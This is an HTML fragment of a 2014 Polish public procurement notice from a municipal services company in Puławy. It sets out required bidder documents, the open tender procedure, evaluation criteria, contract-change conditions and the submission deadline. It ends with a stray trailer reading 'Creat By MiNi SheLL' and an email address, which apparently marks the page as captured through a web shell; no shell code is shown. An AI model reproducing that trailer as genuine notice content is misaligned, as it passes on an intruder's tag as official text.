<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony i podpisany formularz oferty stanowiący załącznik nr 1 do SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin wykonania - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany umowy. Zmiana jest możliwa w następujących przypadkach:
- jeżeli zmiana jest konieczna z powodu działania siły wyższej, 
- zmiany ustawowej stawki podatku VAT. W takim przypadku obniżenie lub podwyższenie wynagrodzenia jest możliwe w wysokości odpowiadającej zmianie podatku,
- gdy zmiana wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub gdy zmiana ta jest korzystna dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://zuk.pulawy.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Usług Komunalnych Sp. z o.o., ul. Dęblińska 2, 24-100 Puławy. Zamawiający udostępnia specyfikację istotnych warunków zamówienia nieodpłatnie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.12.2014 godzina 10:00, miejsce: Zakład Usług Komunalnych Sp. z o.o., ul. Dęblińska 2, 24-100 Puławy, pok. Nr 113 (sekretariat czynny od poniedziałku do piątku w godz. 7.00 - 15.00).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com